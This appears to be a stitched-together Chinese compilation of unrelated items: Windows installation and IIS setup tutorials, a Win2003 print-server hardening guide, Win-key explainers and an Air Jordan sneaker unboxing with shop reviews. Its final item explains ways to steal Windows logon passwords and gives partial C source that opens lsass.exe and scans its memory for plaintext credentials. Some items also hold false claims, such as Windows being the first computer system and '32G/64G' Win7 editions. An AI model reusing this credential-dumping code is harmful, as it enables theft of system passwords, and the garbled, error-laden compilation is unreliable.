为何win10(精品20篇)

win10系统安装方法多种多样，而面对市面上那么多电脑型号与不同主板配置，在安装的细节上更是有差异之分。下面就与大家分享用精英主板uefi启动安装 win10系统 的方法，一起来学习精英主板uefi启动如何安装win10系统吧。

1、做好准备工作，准备好u盘启动盘和win10镜像，由于精英主板要用uefi启动，所以先进bios设置好u盘启动后就能进行安装win10系统了。

2、将带有win10镜像的u盘启动盘插在电脑上，重启电脑后根据提示进行系统安装操作过程，直至安装结束。

win2003对打印服务器的保护

强化打印服务器

概述

因为打印服务器提供的大多数重要服务都需要Microsoft Windows 网络基本输入/输出系统（NetBIOS）相关协议的支持，所以本章将重点讨论在进一步强化打印服务器安全性方面存在的一些挑战。服务器消息块（SMB）协议和通用Internet文件系统（CIFS） 协议能给未经授权用户提供大量的信息。因此，我们经常建议在高安全性的Windows环境中禁止打印服务器使用这些协议。但是，禁用这些协议可能给您的环境中的管理员和用户访问打印服务器造成一定的困难。

审核策略设置

安全选项

Microsoft网络服务器：数字签署通信（始终）

表7.1：设置

"Microsoft网络服务器：数字签署通信（始终）"设置决定了数据包签署对于SMB服务器组件来说是否是必需的。SMB协议为Microsoft的文件和打印共享以及像远程Windows管理这样的其它许多网络操作提供了基础。为了阻止SMB数据包在传输过程中受到人为攻击，SMB协议支持SMB数据包的数字签署。该设置决定了服务器和SMB 客户端之间的通信在被允许之前是否可以忽略SMB数据包的数字签署。

尽管该设置被缺省为禁用状态，但是您可以通过MSBP在本指南定义的高安全性环境中启用服务器的这个设置。您可以启用打印服务器上的这个设置以便用户执行打印操作，但是它不允许用户查看打印队列。试图查看打印队列的用户将得到拒绝访问的消息。出于上述原因，在本指南定义的三种环境中，"Microsoft 网络服务器：数字签名通信（始终）"设置被配置为"禁用 "打印服务器。

事件日志设置

系统服务

任何服务和应用软件都是攻击者的潜在目标，所以应该禁用或删除不需要的服务和可执行文件。在MSBP中，可选服务和不必要服务都应该被禁用。以下内容详细描述了应该在打印服务器上启用的服务。

后台打印

表7.2：设置

"后台打印处理"服务管理着所有本地和网络打印队列并控制所有的打印工作。后台打印处理服务是 Windows 打印子系统的中心，它与打印驱动程序和输入/输出（I/O）组件进行通信。

打印服务器依赖于"后台打印处理"服务的正确运行。为了让打印服务器处理客户机的打印工作，该服务必须设置为运行。您可以使用组策略将" 后台打印处理" 服务的启动模式设置为"只允许服务器管理员访问"，以防止服务被未经授权或怀有恶意的用户设置或操作。组策略也可以防止管理者无意中禁用该服务。其原因是：在本指南定义的三种安全环境中，"后台打印处理"设置都被配置为"自动"。

其它安全性设置

MSBP中应用的安全设置大大提高了打印服务器的安全性。不过，您还需要考虑其它一些注意事项。有些步骤不能通过组策略来完成，而要在所有打印服务器上手动执行操作。

保护众所周知帐户的安全

Microsoft Windows Server? 2003具有大量的内置用户帐户，这些帐户不能被删除，但是可以重命名。Windows 2003中最常见的两个内置帐户是Guest 和Administrator 。Guest 帐户在成员服务器和域控制器上缺省为禁用状态。此设置不应该被更改。内置的Administrator 帐户应该被重命名并改变描述。以防止攻击者利用该帐户危及远程服务器的安全。许多恶意代码的变种企图使用内置的管理员账户来破坏一台服务器。在近几年来，进行上述重命名配置的意义已经大大降低了，因为出现了很多新的攻击工具，这些工具企图通过指定内置 Administrator 账户的安全标识（SID）来确定该帐户的真实姓名，从而侵占服务器。SID是识别每个用户、组、计算机帐户和网络登录的唯一值。要改变内置帐户的SID 是不可能的。您可以用一个特别的名字重新命名本地的administrator帐户，以便您能够监控对该帐户的攻击行为。

保护打印服务器上的众所周知帐户

1. 重新命名Administrator和Guest帐户，然后改变每个域和服务器的密码为长且复杂的值。2. 为每个服务器使用不同的名称和密码。如果所有的域和服务器使用同一个帐户名和密码，取得一个服务器访问权的攻击者就可以用相同的帐户名和密码取得其它域和服务器的访问权。3. 改变缺省的帐户描述，以防止这些帐户被轻易识别出来。4. 在安全的地方记录上述改变。

注意：内置的Administrator帐户可以通过组策略重新命名。这个设置不能通过本指南提供的任何安全模板进行配置，因为您应该为您的环境选择一个特别的名字。在本指南定义的三种环境下，"账户：重命名管理员账户"可以被配置为重命名管理员账户。该设置是组策略安全选项设置的一部分。

保护服务帐户的安全

除非绝对必要，决不要将服务设定为在域帐户的安全上下文中运行。如果服务器的物理安全受到破坏，域账户密码可以很容易通过转储本地安全性授权（LSA）秘文而获得。

用IPSec过滤器阻断端口

Internet协议安全（IPSec）过滤器能为提高服务器的安全级别提供一条有效的途径。本指南推荐在其定义的高安全性环境中使用该选项，以便进一步减少服务器的攻击表面积。

下表列出了可以在本指南定义的高安全性环境中的打印服务器上创建的所有IPSec过滤器

表7.3：打印服务器IPSec网络流量图

在实现上表中列出的所有规则时都应该进行镜像处理。以确保进入服务器的所有网络流量也可以返回到源服务器。

上表描述了服务器执行特别任务功能所需打开的基本端口。如果服务器使用静态IP地址，那么这些端口就已经足够了。要是希望提供其它功能，您需要开放其它端口。开放其它端口可使您环境中的打印服务器更容易管理，不过，它们可能大大降低这些服务器的安全性。

因为域成员和域控制器之间存在大量交互操作，在特殊的RPC和身份验证通信中，您需要允许文件服务器和所有域控制器之间的所有通信。通信还可以被进一步限制，但是大多数环境都需要为有效保护服务器而创建更多的过滤器。这使得IPSec策略的执行和管理更为困难。与一个打印服务器相关的所有域控制器都要创建相似的规则。为了提高打印服务器的可靠性和可用性，您需要为环境中的所有域控制器添加更多规则。

如上所述，如果需要在环境中允许Microsoft Operation manager（MOM），运行IPSec过滤器的服务器和MOM服务器之间的所有网络通信都必须被允许通过。这一点十分重要，因为MOM服务器和OnePoint客户--向MOM控制台提供报告的客户端应用程序--之间具有大量的交互行为。其它的管理软件可能也具有类似的要求。如果您需要更高级别的安全性，OnePoint客户过滤操作可以被配置为就IPSec和MOM服务器进行协商。

IPSec策略可以阻止任意一个高端口的通信，因此，您将无法进行远程过程调用（RPC）通信。这使得服务器的管理更加困难。因为这么多的端口已经被有效关闭，您可以启用终端访问，以方便管理员进行远程管理。

上面的网络流量图假定环境中包括启用了Active Directory的DNS服务器。如果使用静态DNS服务器，您还需要设定其它规则.执行IPSec策略不会对服务器的性能产生太大影响。不过，您应该在执行这些过滤之前首先进行测试，以便确保服务器的必要功能和性能得以保持。如果希望支持其它应用软件，您还需要添加其它的规则。

本指南包括一个.cmd文件，它简化了依照指南要求为域控制器创建IPSec过滤器的过程。PacketFilters-File.cmd文件使用NETSH命令创建适当的过滤器。您必须修改.cmd文件以使它包括您所在环境中的域控制器的IP地址。脚本为即将添加的域控制器提供了两个占位符。如果需要，您还可以添加其它的域控制器。域控制器的IP地址列表必须是最新的。

总结

本章阐述了在本指南所定义的三种环境中保护打印服务器的安全所需采取的服务器强化设置。所论述的大多数设置都通过使用组策略来进行配置和加载的。您可以将能够为MSBP提供有益补充的组策略对象（GPO）链接到包含打印服务器的相应组织单位（OU），以便为这些服务器提供的服务赋予更多的安全性。

文中提及的某些设置不能使用组策略来进行应用。在这些情况下，我们提供了手动配置这些设置所需的详细资料。此外，我们还详细介绍了创建和应用能够控制打印服务器间网络通信类型的IPSec过滤器的具体过程。

电脑在刚被发明出来的时候是被用于美国军事的，那时候的电脑体积还非常庞大，而且功能单一。到了后来，科技不断进步，电脑功能不断进步不断完善，成为了我们生活中不可缺少的一部分。而windows则是第一个被发明出来的电脑系统，xp就是windows旗下的一款系统。有人问小编xp系统要如何升级win7系统，接下来就让小编来告诉大家升级的详细方法介绍。

1、首先确保电脑可以联网：

确保电脑联网就是说我们要下载新的系统，并且要保证有足够快的网速，因为大家都知道xp系统的内存大小可能只有几百兆，而win7系统因为比xp系统的设计更加美观和好看，所以大概有1-2G的内存，因此一定要选择一台能高速上网的电脑，确保安装顺利进行。

2、到网站下载win7系统：

大家知道现在电脑这么方便只要能上网几乎没有干不成功的事情，这一步我们就可以到网上搜索下载win7系统，然后下载，个人推荐Ghost版本的系统，因为我们很多人来说，已经习惯了xp系统，新的win7系统还是十分陌生，所以对于新加入win7家庭的人来说，Ghost十分的方便和好用。

3、选择适合自己电脑的系统进行下载:

win7系统包括两种大小的系统，分别是32G和64G的，64G的内存大小约为3G左右，而32G的大小要小点，在2G左右，所以要是电脑足够好的话，就选择64G的，一般的普通的就选择32G的就可以了。本人推荐到专业的下载软件的网站里面进行下载，就像系统之家这样的下载网站。可以进行迅雷工具下载，更安全。

4、开始安装win7系统：

下载完适合自己电脑的系统之后，就可以开始安装了，推荐给大家的Ghost版本的系统十分方便安装，点击一键安装就可以了。

5、安装完毕：

一键安装完毕之后就可以使用电脑的新系统了，因为系统中可能存在很多已经自身携带的软件在里面，所以要是自己喜欢就可以保留，要是自己不喜欢的话就可以把它删除掉，卸载掉就可以了。

airjordan11winlike82是AJ会在双十一当天带来的全新配色，这款很像大魔王配色的AJ11设计的还是很有特色的，款式非常好看。下面本网小编给大家讲讲airjordan11winlike82配色实物开箱怎么样？

AJ11海军蓝实物开箱

相信很多人都在期待着这双airjordan11winlike82的实物图，等着双十一收入囊中，我们一起来看看吧。拥有着全新配色的AirJordan11“WinLike82”，实物真的很帅!小编提前拿到了这双AirJordan11“WinLike82”，先来一波开箱图，稍后还会为大家带来上脚穿搭敬请期待!

AirJordan11“WinLike82”采用亮眼的海军蓝漆皮搭配白色尼龙鞋面，后跟点缀北卡蓝色JumpmanLogo，最后以淡蓝色水晶底收尾!

该配色以1982年MichaelJordan帮助北卡大学队取得关键胜利赢得最终冠军为主题，展现了巨星之路的开端为灵感来源，整体效果与超人气AirJordan11“Concord”极为相近，泛着淡淡蓝色给人一种熟悉但却耳目一新的视觉感受!中国区将在11月11日早9点正式发售，定价¥1599RMB。

AJ品牌介绍

空中飞人(AirJordan)是耐克旗下以史上最著名的NBA球星迈克尔·乔丹(MichaelJordan)命名的系列。1985年，迈克尔·乔丹(MichaelJordan)以高薪合约被当时还是小厂家的体育用品生产商耐克(Nike)签约至旗下，耐克(Nike)更随即为乔丹推出了第一款以乔丹命名的球鞋，即空中飞人(AirJordan)系列的第一款。虽然这款球鞋在当时具备奇特的配色以及新奇的科技，但是谁都不曾想到，这居然会是一个神话的开始。AIRJORDAN外底使用坚实的牵引力和出色的柔性。凹槽模仿人类脚的自然运动而设计。JordanBrand的汤姆Luedecke解释说：“它的纬向工程实际相匹配的足迹。我们正在寻找一个脚印发现鞋的磨损最初发生地方，适量的牵引模式”。乔丹品牌开发的专有编织技术和标准碳纤维并不会有什么不同，但它的大小和形状是有不同的。

AJ鞋子怎么样

我开始了解aj应该是我高三的时候，到大学的时候想买aj的心早就蠢蠢欲动了，但当时aj还是饥饿营销，需要抽号才能得到，而且一双1000块对于一个月生活费2000的我确实有点高，所以只能羡慕别人穿。后来上班了能买的起了，但是又没有好看的颜色，对于颜控来说，我只喜欢aj4和5还有13，这次七夕和男票去世贸天阶吃饭，说到去这个亚洲最大aj围观，正好试到了这双鞋，穿38竟然合适，卖鞋的小姐姐说aj就要买大半码，男票看我喜欢就掏腰包把我买下了。

aj里面最喜欢的就是aj11和aj4了，颜值高而且不磨脚!真的不磨脚!穿高帮鞋子最怕磨脚后跟，出去要是逛个街吃个饭回来脚后跟基本不是水泡而是血迹斑斑。aj4鞋底软踩屎感十足哈哈哈哈，鞋子的包裹性特别好，长期穿高跟鞋的女孩偶尔可以试试aj4，给自己的脚放个假。

鞋子非常好看!很完美没有瑕疵!客服非常热情!正不正品我不知道!但是真的很霸气!感谢客服。

外观绝对可以，就是怎么上手感觉表面的皮质有点硬，不像是皮的。没有想象的柔软。生硬你们买的是不是这种感觉问问大家?

穿着很好，很喜欢aj，在这家买了三双，还有一双没拍～店家服务态度也很好!好看，发朋友圈都会说，现在美女都喜欢穿球鞋了吗，哈哈哈，美死了!喜欢喜欢，不要克制，贵的总是好的!正品aj爱死了，以后继续来买。

小改BIOS 双显卡笔记本顺利安装win7

现在很多潮人都开始在试玩新一代操作系统Windows 7，甚至连上网本也可以顺利安装Windows7了。。

笔者也想尝一尝鲜，在自己的ThinkPad T400笔记本上安装，但是在安装过程中，加载显卡驱动时出现了不兼容的问题，导致系统安装失败。这是怎么回事呢？由于ThinkPad T400支持集成/独立显卡切换技术，笔者怀疑是自己安装的RC版Windows7不支持显卡切换造成的系统安装故障，故此进行了以下设置，关掉笔记本显卡切换功能，然后就能正常安装系统了。

要关闭集成/独立显卡切换功能，需要进行入BIOS关闭此项功能。重启系统，按F1键进入BIOS。启动BIOS之后，展开Config→Display项，找到OS Detection for Switchable Graphics项目，将该项目的值设置为Disabled，就可以关闭集成/独立显卡功能。按下F10键保存设置后，退出BIOS。

提示：在BIOS操作中，上以键盘操作为主，指点杆或触摸板通常无法工作。按下键盘上的光标键可以选择需要设置的相关项目，按下回车键则可确认设置的参数。

在接下去安装Windows7的过程，几乎是一路畅通，没有出现任何错误。除了ThinkPad T400之外，其他拥有集成/独立显卡切换技术的笔记本电脑，也可通过BIOS关闭显卡切换功能，即可安装Windows7。

戴尔Latitude14 5401笔记本是一款2020年上市的商务办公笔记本电脑，这款电脑搭载了英特尔酷睿第九代i5处理器以及性能级独立显卡，能够满足用户们日常办公使用需求，那么戴尔latitude 14 5401笔记本怎么使用u启动u盘启动盘安装win10系统呢?今天为大家分享戴尔latitude 14 5401笔记本使用u启动u盘启动盘安装系统的操作教程。

准备工作：

1、下载u启动u盘启动盘制作工具

2、下载win10系统镜像并存入u盘启动盘中

安装win10系统操作步骤：

1、把已经制作好的u启动u盘启动盘插入电脑usb接口，设置好开机启动项并按快捷键进入u启动主菜单界面，选择“【02】u启动win8pe标准版(新机器)”并回车，

2、在u启动pe装机工具中，系统会自动识别系统镜像安装包，在下拉菜单中选择win10系统镜像，接着选择c盘做系统盘，点击“确定”，

3、这时会弹出程序将执行还原操作提示框，点击“确定”，

4、之后就是系统还原过程，还原成功后电脑会自动重启计算机，然后进行程序安装，静静等待安装完成，

5、win10安装完成后就可以进行系统的相关设置了，之后便可使用win10系统。

关于戴尔latitude 14 5401笔记本使用u启动u盘启动盘安装win10系统的操作步骤就为小伙伴们详细分享到这里了，如果用户们对使用u启动u盘启动盘安装系统不够了解，可以尝试以上方法步骤进行操作哦，希望本篇教程能够帮到大家，更多精彩教程请关注小编。

win10如何在桌面创建快捷方式呢？今天小编为大家讲解一下。

操作方法

打开电脑，鼠标左击一下Windows按键，打开一个菜单，如图所示。

向下滑动该页面，找到需要创建桌面快捷方式的应用，如图所示。

找到之后，右击一下，选择“更多”，如图所示。

打开之后，点击“打开文件位置”，进入下一页面，如图所示。

进入文件夹之后，右击一下程序选择桌面快捷方式即可，如图所示。

特别提示

以上纯属个人编写，请勿转载抄袭。

win键一般指Windows键。Windows键，简称“Winkey”或“Win键”，是在计算机键盘左下角 Ctrl和 Alt键之间的按键，台式机全尺寸键盘的主键盘区右下角往往也有一个 （一般和一个功能相当于鼠标右键的快捷菜单按键在一起），图案是Microsoft Windows的视窗徽标。

Microsoft Windows操作系统是美国微软公司研发的一套操作系统，它问世于1985年，起初仅仅是Microsoft-DOS模拟环境，后续的系统版本由于微软不断的更新升级，不但易用，也成为了当前应用最广泛的操作系统。win键是在计算机键盘左下角 Ctrl和 Alt键之间的按键。

Windows采用了图形化模式GUI，比起从前的Dos需要输入指令使用的方式更为人性化。随着计算机硬件和软件的不断升级，微软的 Windows也在不断升级，从架构的16位、32位再到64位,系统版本从最初的 Windows 1.0到大家熟知的 Windows 95、 Windows 98、 Windows 2000、 Windows XP、 Windows Vista、 Windows 7、Windows 8、Windows 8.1、Windows 10和Windows Server服务器企业级操作系统，微软一直在致力于Windows操作系统的开发和完善。

Windows 1.0是微软公司第一次对个人电脑操作平台进行用户图形界面的尝试。Windows 1.0基于MS-DOS操作系统。Microsoft Windows 1.0是Windows系列的第一个产品，于1985年开始发行。

2015年7月29日，美国微软公司正式发布计算机和平板电脑操作系统Windows 10。

2014年10月1日，微软在旧金山召开新品发布会，对外展示了新一代Windows操作系统，将它命名为“Windows 10”，新系统的名称跳过了数字“9”。2015年1月21日，微软在华盛顿发布新一代Windows系统，并表示向运行Windows7、Windows 8.1以及Windows Phone 8.1的所有设备提供，用户可以在Windows 10发布后的第一年享受免费升级服务。

如何在win2003环境中设置一个web服务器

本文介绍了如何在 Windows Server 2003 环境中设置一个用于匿名访问的WWW服务器。

安装 Internet 信息服务

Microsoft Internet 信息服务 (IIS) 是与Windows Server 2003 集成的 Web 服务。

要安装IIS、添加可选组件或删除可选组件，请按以下步骤xx作：

单击开始，指向控制面板，然后单击“添加或删除程序”。

“添加或删除程序”工具就会启动。

单击添加/删除 Windows 组件。

显示“Windows 组件向导”。

在Windows 组件列表中，单击Web 应用程序服务器。

单击详细信息，然后单击Internet 信息服务 (IIS)。

单击详细信息，以查看 IIS 可选组件列表。

选择您要安装的可选组件。默认情况下，下列组件是选中的：

公用文件 FrontPage 2002 Server Extentions Internet 信息服务管理单元 Internet 信息服务管理器 NNTP 服务 SMTP 服务

World Wide Web 服务

单击“World Wide Web 服务”，然后单击详细信息 ，以查看 IIS 可选子组件（如Active Server Pages 组件和“远程管理 (HTML) 工具”）的列表。选择您要安装的可选子组件。默认情况下，下列组件是选中的：

World Wide Web 服务

单击确定，直到返回“Windows 组件向导”。

单击下一步，然后完成“Windows 组件向导”。

配置匿名身份验证

要配置匿名身份验证，请按以下步骤xx作：

单击开始，指向管理工具，然后单击Internet 信息服务 (IIS)。

展开“* 服务器名称”（其中服务器名称 为该服务器的名称），右键单击Web 站点，然后单击属性。

在Web 站点属性 对话框中，单击目录安全性 选项卡。

在“身份验证和访问控制”下，单击编辑。

单击“启用匿名访问”复选框，将其选中。

备注：“用户名”框中的用户帐户只用于通过 Windows guest 帐户进行匿名访问。

默认情况下，服务器会创建并使用帐户IUSR_computername。匿名用户帐户密码仅在Windows 中使用；匿名用户不使用用户名和密码登录。

在“已验证身份的访问”下，单击“集成的 Windows 身份验证”复选框，将其选中。

单击确定两次。基本 Web 站点配置

单击开始，指向管理工具，然后单击Internet 信息服务 (IIS)。

展开“服务器名称”（其中服务器名称 为该服务器的名称），然后展开Web 站点。

右键单击默认Web 站点，然后单击属性。

单击Web 站点选项卡。如果您已为计算机分配了多个 IP 地址，则请在IP 地址 框中单击您要指定给此 Web 站点的 IP 地址。

单击性能选项卡。使用Web 站点属性- 性能对话框可设置影响内存、带宽使用和Web 连接数量的属性。

通过配置某个特定站点上的网络带宽，您可以更好地控制该站点的通信量。例如，通过在低优先级的 Web 站点上限制带宽，您可以放宽对他站点的访问量的限制。同样，当您指定到某个 Web 站点的连接数量时，您就可以为其他站点释放资源。设置是站点专用的，应根据网络通信量和使用变化情况进行调整。

单击“限制可用于此 Web 站点的带宽”复选框，将其选中，可配置 IIS 将网络带宽调节到选定的最大带宽量，以千字节每秒 (KB/S) 为单位。 单击Web 服务连接复选框，将其选中，可选择特定数目或者不限定数目的 Web 服务连接。限制连接可使计算机资源能够用于其他进程。

备注：每个浏览 Web 站点的客户机通常都使用大约三个连接。

单击主目录选项卡。

如果您想使用存储在本地计算机上的 Web 内容，则单击“此计算机上的目录”然后在本地路径 框中键入您想要的路径。例如，默认路径为 C:Inetpubwwwroot。

备注：为了增加安全性，请不要在根目录下创建 Web 内容文件夹。

如果要使用存储在另一台计算机上的 Web 内容，则单击“另一计算机上的共享位置”，然后在显示的网络目录框中键入所需位置。

如果您要使用存储在另一个 Web 地址的 Web 内容，则单击“重定向到 URL”，然后在“重定向到”框中键入所需位置。在“客户会送到”下，单击相应的复选框，将其选中。

最近，许多朋友报告说，他们的电脑找不到添加或删除程序的位置，导致一些软件无法删除系统，影响内存容量，不用担心，立即为朋友提供解决方案win7添加删除程序的具体操作方法，有需要的小伙伴一起往下看。

解决办法如下；

1、点开始，程序，找到控制面板。

2、打开控制面板，发现里面没有卸载程序选项；

3、观察右上角，目前为小图标；

4、点击小图标旁边的小箭头，选择类别；

卸载程序出现在左下角；

6、点击卸载程序进入卸载或更改程序窗口；

7、选择要卸载的程序，然后点击卸载即可卸载不再需要的程序。

嗯，只有按照上述操作步骤设置，才能解决win7系统中删除和添加程序的问题，希望本文能对有需要的小伙伴有所帮助。

联想拯救者系列型号笔记本出厂自带win8系统，有些想安装成win7系统的朋友不知道怎么重装。这边用u盘装系统的方法教大家联想拯救者 win8改win7 ，有需要的朋友可以参考看看。

1、首先制作一个u启动u盘启动盘，然后将win7镜像存放在u盘中。接着进行bios设置win8改win7，可以参考文章“ 联想win8改win7bios设置方法 ”。设置好之后将u盘插入电脑中重启电脑，设置u盘启动并进入u启动主菜单中，选择运行win8pe选项回车。如图：

2、接着检查分区表格式是否为mbr格式，如果不是则将分区表格式转换成mbr格式，可以使用傲梅分区助手工具转换。如图：

3、然后在弹出的u启动pe装机工具中选择win7镜像安装在c盘中，点击确定按钮，如图：

4、弹出程序将执行还原操作窗口，勾选完成后重启，直接点击确定即可。如图：

5、最后就是程序的安装过程，静静等待安装完毕即可，如图：

对于用u盘装系统装机已经是老方法了，联想拯救者win8改win7操作过程也为大家分享到这边，如果想更彻底得了解就自己动手安装试试哦。

win键最大的作用，在于它和其他按键组合，实现电脑各种特殊功能。那么，win键是哪个键呢？

Win键英文全称为Windows键，Win键是电脑键盘中带有Windosw图标的按键，通常位于键盘左下角，在Ctrl键和Alt键中间。笔记本电脑键盘布局和台式机键盘不一样，笔记本电脑键盘上多了一个Fn功能键，win键通常是Fn和Alt中间的徽标键。

Win键可以配合其它键快速打开电脑程序，节省用户时间。有的键盘可以屏蔽win键的功能，使用键盘前可阅读键盘说明书。Win键的功能十分多样。例如，按下win键可以显示或隐藏“开始”菜单。Win+Break键能打开“系统属性对话框”。win+R可以打开“运行”对话框等等。

使用u盘启动盘装系统可以用好几种方法，这边就为您带来关于用windows安装器来 安装原版win7 系统的方法，感兴趣的朋友们可以一起来学学，下面我们来看看用windows安装器怎样安装原版win7系统。

1、将制作好的u启动u盘启动盘插入电脑usb接口，然后按开机启动快捷键进入u启动pe系统主菜单界面，选择“【02】运行u启动win8pe防蓝屏版(新电脑)”并回车，如图：

2、打开pe系统桌面上的“虚拟光驱”，点击“装载”加载win7系统镜像，如图：

3、打开pe系统桌面上的“windows安装器”，选项卡切换到“Windows Vista/7/8/2008/2012”上，选择好磁盘安装的相应路径，windows安装文件的路径为“H:sourcesinstall.wim”(这边路径可以通过上个步骤装载虚拟光驱过程来看)，点击“开始安装”，如图：

4、之后在弹出的提示框中点击确定，这里可根据自身需要勾选相应选项，如图：

5、接着重启电脑，就开始安装win7系统了，我们只需静静等待，直至安装完成后进行相应系统设置后就能使用win7了。如图：

如何在win2003中得到登陆密码

在所有NT系统中，都是有几种方法可以得到登陆用户的密码的。我知道的三种方法可以达到目的。

1.hook了winlogon中几个函数，网上也有这类型的程序，叫winlogonhijack的项目在rootkit.com中有提供，不过那个项目只对本地登陆用户有效，远程登陆用户无效。 2.使用Gina和winlogon进行套接，只要对某些函数执行自己的记录密码的代码，就可以将密码记录下来，稳定性高，而且对本地或远程登陆都有效，不过现存的gina后门程序在XP或2003中都有些函数没有被导出过，主要因为xp和2003等在winlogon中加入了新的函数。

3.直接读取内存数据得到明文密码。在NT 4.0/2K中，早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码，因为在NT4.0和2K中，帐号的信息，包括域名，帐号和密码都是有规律地在winlogon内存中的特定地址中，所以可以很简单就得到。但在XP和2003系统中，这样方法是无效的了，似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT 4.0和2K在，在server 2003中得到登陆用户的密码。

虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内，但是基Lsass进程对于要处理些信息时，需要得到明文的登陆用户密码，所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密，微软的说法是因为Lsass需要得到明文的密码，就算将密码加密，也都只能用可逆的方法加密，只要跟踪lsass的操作，一样可以得到明文密码，所以微软使用了比较懒惰的方法，可能也是为了加快响应速度，所以将明文密码更是放在lsass进程内存内)。说到这里，大家心里都清楚了，登陆用户的密码是在lsass进程的内存中。对，就是这么一回事，但是要得到这个明文密码，真是象使用NT 4.0和2K下的findpass那样容易吗?事实上并不是那么容易，因为以下几个原因:

A.密码存放在lsass进程中的内存地址是没有规律的

B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆，然后管理员bbb从远程登陆，然后管理员bbb注销终端，存放在lsass.exe进程内存中的密码，还是管理员bbb的密码)，又或者用户登陆后，然后注销了，那么我们就算得到了密码，也不知道是哪个用户的密码。

C.密码前后的数据也是没有规律的，如果有规律，例如密码前的数据，一定是有一段全是01字符的数据段，那么定位密码就简单。

原因A和C都给我们带来定位密码的困难，原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的，就算是碰碰运气，也看能不能得到密码，反正就算失败，也没什么关系。

最后的代码，是我写来测试是不是能在2003的系统中得到登际用户的密码，结果也正好象我们上面的分析一样(当然了，上面的结果是用这程序测测得到的)。成功率当然不高，因为受太多原因所影响，定位密码上的困难或者无法定位，或者得到不是密码的信息等等的原因，都令失败率显得相当高，不过总还是一种方法，或者将来有人可以准确定位到，那就是令人高兴了。虽然说失败率高，但在一种情况下，成功率却是很高的，那就是管理员只是在本地或终端中登陆了，以后再没有用户从本地或终端登陆过，而且管理员也没有锁上过系统，那么成功率就会是相当高的了。

提高成功率的两种做法:

1.程序直接写成服务，定时检查本地或远程登陆(其实没什么分别)，当检测到登陆后，去搜索lsass进程内存，尝试得到密码。 2.程序模拟一个登陆(使用LogonUser()就能搞定)，因为使用LogonUser()这个API，你要提供帐号名和对应的正确的密码，才可以成功，然后你就可以去搜索lsass进程内存。因为知道密码是什么，我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中，模拟登陆和搜索，可以先定位以后登陆的用户的密码会大约保存在什么位置。

无论怎说，三种方法中，最稳定，最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法，毕竟是改动了系统的东西，对系统的稳定性来说，会有考验，直接搜索lsass进程内存的方法呢，虽说也是困难，但准确性，成功率却又是低。

下面的代码使用的是很笨，而且很原始的搜索方法，主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串，因为在相当多的测试中，密码都是保存在有这个字符串的地址后一点的位置中，当然了，很多系统并没有这个字符串，或者就算有，我们得到的都是错误的密码。

代码: //************************************************************* // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box，The Method // Used Is Pretty Unwise，But This May Be The Only Way To Review The // Logon Users Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //*************************************************************#include #include #include

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address，Which Causes The Result Unreliable

char Password[MAX_PATH] = ; // Store The Found Password

// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer，const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //------------------------------------------------------------------------------------------------------ // End Of Fucntion ProtoType Declaration

int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDropnn");

if (!Is2003()) // Check Out If The Box Is 2003 {printf("The Program Cant Only Run On Windows 2003 Platformn");return -1; }

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom {return -1; }

FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()

//------------------------------------------------------------------------------------ // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer -->The Memory Buffer To Search // Out: const UINT nSize -->The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"， // Since The Password Is Near The Above Location，But Its Not Always True That // We Will Find The Magic String，Or Even We Find It，The Password May Be Located // At Some Other Place.We Only Look For Luck //------------------------------------------------------------------------------------ int Search(char *Buffer，const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) {return -1; } for (i = 0 ; i 0){Password[Count++] = Buffer[j];}else{break;}}return i + 7; // One Flag To Indicate We Find The Password}} } return -1; // Well，We Fail To Find The Password，And This Always Happens } // End Search

//------------------------------------------------------------------------------------ // Purpose: To Get The Lsass.exe PID // Return Type: DWORD // Parameters: None //------------------------------------------------------------------------------------ DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS， 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) {printf("Fail To Create Snap Shotn");return 0; }

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap， &pe32)) {CloseHandle(hProcessSnap); // Must clean up the snapshot object!return 0; }

do {if (strcmpi(pe32.szExeFile，"Lsass.EXE") == 0){PID = pe32.th32ProcessID;break;} }while(Process32Next( hProcessSnap， &pe32));

CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()

//------------------------------------------------------------------------------------ // Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID ->The Lsass.exes PID //------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = ; DWORD ByteGet = 0; int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ，FALSE，PID); // Open Process if (hProcess == NULL) {printf("Fail To Open Processn");return FALSE; }

if (!ReadProcessMemory(hProcess，(PVOID)BaseAddress，Buffer，5 * 1024，&ByteGet)) // Read The Memory From Lsass.exe {printf("Fail To Read Memoryn");CloseHandle(hProcess);return FALSE; }

